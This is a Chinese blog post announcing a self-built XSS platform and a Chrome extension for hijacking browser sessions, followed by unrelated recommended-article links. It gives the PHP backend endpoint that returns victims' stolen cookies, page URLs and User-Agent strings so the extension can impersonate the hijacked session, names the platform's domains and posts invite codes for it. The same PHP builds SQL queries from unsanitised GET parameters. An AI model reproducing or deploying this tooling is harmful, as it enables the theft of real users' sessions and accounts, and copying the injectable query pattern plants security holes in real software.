原先一直用xss.hk结果不知怎么被关的,正好手上有代码于是自己搭了一个,网上的类似的xss平台大多一样,原先的xss的chrome插件,不适合 "manifest_version": 2, 
而且很多其他的xss平台直接把代码拿过来,chrome插件的里面的许多代码内容跟xss.me这个与域名绑定的,而且有些加密cookie里面有浏览器的ua信息绑定,所以只用插件替换cookie有时候无法达到效果,否则得借助第三方修改header的插件,我们希望的是完全模拟劫持到的浏览器会话。 
于是有了这一次的修改,php那把在/do/auth的那个接口返回增加了劫持ua的信息,点击口修改当前浏览器cookie跟ua来劫持会话。 
数据放在别人那总归不放心,当然你也可以只用插件,填你自己的接口的信息,你只用插件来劫持会话,我也不会知道你的数据,不过你得稍微修改下php后台的的接口。

平台地址:

x.liet.me

因被公司和谐,域名转到原先的账号依然存在 code4liet.duapp.com

chrome xss mitm attack插件代码地址

https://github.com/lietdai/xss-mitm-attack

修改后的do.php

<?php

/**

 * api.php 接口

 * ----------------------------------------------------------------

 * OldCMS,site:http://www.oldcms.com

 */

if(!defined('IN_OLDCMS')) die('Access Denied');

$auth=Val('auth','GET');

$db=DBConnect();

$project=$db->FirstRow("SELECT * FROM ".Tb('project')." WHERE authCode='{$auth}'");

if(empty($project)) exit('Auth Err.');

switch($act){

    case 'content':

    default:

        $domain=Val('domain','GET');

        $where='';

        if(!empty($domain)) $where.=" AND domain='{$domain}'";

        $res=$db->Dataset("SELECT content,serverContent FROM ".Tb('project_content')." WHERE projectId='{$project[id]}' {$where} ORDER BY id DESC");

        $data=array();

        foreach($res as $k=>$v){

            $row=array();

            $content=json_decode($v['content'],true);

            $serverContent = json_decode($v['serverContent'],true);

            $row['url']=$content['opener']?$content['opener']: $content['toplocation'];

            $row['cookie']=$content['cookie'];

            $serverContent = json_decode($v['serverContent'],true);

            $row['ua'] = $serverContent['HTTP_USER_AGENT']?:"";

            $data[]=$row;

        }

        echo JsonEncode($data);

        break;

}

?>

发几个邀请码

71ac500c5a331cb7b2806a8e817f1672

34f3f778fa77c0f7fe8efb162ae70db0

df8825cf489fbca96a4663262afd02e1

65d17af1988fdde9f81696105c0ce3eb

4bdf5873cc19e995a925cbf203fdeeba

a66411d043503ea0bfe106a98a093c59

0695d3e66ab68d2b6d88949cbaf575c3

fb92a90b9a8264862699ed04a7d432a4

d358e24bc7ce3e81c73d54dbbb8b1195

禁止x政教=。=

自改xss小平台上线的更多相关文章

  1. APP_DEBUG改成false上线之后发现:“页面错误!请稍后再试~

      TP框架 页面错误!请稍后再试 把APP_DEBUG改成false上线之后发现:"页面错误!请稍后再试-". 问题一般是出在,display() 指定某个具体的模板文件后win ...

  2. JVM调优基础到进阶

    GC和GC Tuning GC的基础知识 1.什么是垃圾 C语言申请内存:malloc free C++: new delete c/C++ 手动回收内存 Java: new ? 自动内存回收,编程上 ...

  3. GC和GC Tuning

    GC和GC Tuning GC的基础知识 什么是垃圾 C语言申请内存:malloc free C++: new delete c/C++ 手动回收内存 Java: new ? 自动内存回收,编程上简单 ...

  4. JVM学习笔记-从底层了解程序运行(二)

    解决JVM运行中的问题 一个案例理解常用工具 测试代码: /** * 从数据库中读取信用数据,套用模型,并把结果进行记录和传输 */ public class T15_FullGC_Problem01 ...

  5. Diy页面服务端渲染解决方案

    1. 问题由来 在移动互联网电商领域,运营每天需要搭建多个促销页面来吸引用户去点击去购买,一开始程序员临时写个新页面去实现,可这些页面可以用几次就不用了,每次创建新页面去实现费时费力,而且,电商的运营 ...

  6. 防止ARP欺骗的方法!!!

    防止ARP欺骗的方法!!! 根据鄙人上网经常掉线,怀疑可能是某人使用网络剪刀手,网络执行官,局域网终结者等工具.经过搜索有关资料,有了一点点防范经验,借以参考~! 一 首先我们来了解下这类攻击工具的原 ...

  7. Tomcat服务器

    常见的web服务器 1. WebLogic是BEA公司的产品,是目前应用最广泛的web服务器,支持J2EE规范(J2EE里有13种技术),商业产品,收费的.银行,证券等对并发,安全要求高的时候用,一般 ...

  8. 本地修改js代码并时时生效的解决办法

    js作为客户端语言(当然它也可以作服务端语言),非常强悍,一般情况下,我们都是在开发阶段不停的改,然后上线之后就作为稳定运行的代码. 然而有时候可能因为js写得有问题,导致上线后,某些功能无法使用,这 ...

  9. ARP协议详解RARP

    简单来说,ARP协议是IP地址转换成MAC地址的协议.链路层协议.过程如下: 1:首先,每个主机都会在自己的ARP缓冲区中建立一个ARP列表,以表示IP地址和MAC地址之间的对应关系. 2:当源主机要 ...

随机推荐

  1. 【Android车载系统 News | Tech 2】News 谷歌开发新车载系统!安卓Auto不是终点 2014-12-20

    Google在今年推出了车载安卓系统Android Auto,旨在为汽车提供娱乐.导航等功能.不过,Android Auto并不是终点,现在有消息报道,Google正在开发一个能够彻底取代汽车底层控制 ...

  2. 【Android 界面效果42】如何自定义字体

    项目里要统一用设计师的字体,android:typeface只支持系统三种字体.有什么比较好的做法? 你需要为整个应用替换自定义字体. 解决方案 1)Android默认方法 #1 你可以通过ID查找到 ...

  3. Umbraco(3) - CSS & Javascript(翻译文档)

    原文地址:http://www.ncloud.hk/%E6%8A%80%E6%9C%AF%E5%88%86%E4%BA%AB/umbraco3css-javascript/ CSS & Jav ...

  4. C# struct

    很困惑,为什么C#会有struct 这样一个关键字.虽然我用C#几年了,但绝少用到此关键字.我在相关书籍上学习C#的时候,看到过struct内容——但C#并不是我的第一入门语言,所以没有那么细致的学习 ...

  5. codeforces 676C C. Vasya and String(二分)

    题目链接: C. Vasya and String time limit per test 1 second memory limit per test 256 megabytes input sta ...

  6. php中一串数子的转化

    echo "<meta charset=utf-8>"; echo "笔试题测试"; $str = "123456780"; $ ...

  7. C#的Process类的一些用法

    c#之process类相关整理 一.根据进程名获取进程的用户名? 需要添加对 System.Management.dll 的引用 using System.Diagnostics; using Sys ...

  8. SliverLight(how to show data point on the column series)

    You should know that Silverlight comes with win form drawing software is different, it has no the la ...

  9. 零基础Android学习笔记-03 窗口间的数据传递

    1.通过全局变量来传递. 新建一个全局的类继承于Application package com.example.helloworld; import android.app.Application; ...

  10. html5的自定义data-*属性和jquery的data()方法的使用示例

    人们总喜欢往HTML标签上添加自定义属性来存储和操作数据. 但这样做的问题是,你不知道将来会不会有其它脚本把你的自定义属性给重置掉,此外,你这样做也会导致html语法上不符合Html规范,以及一些其它 ...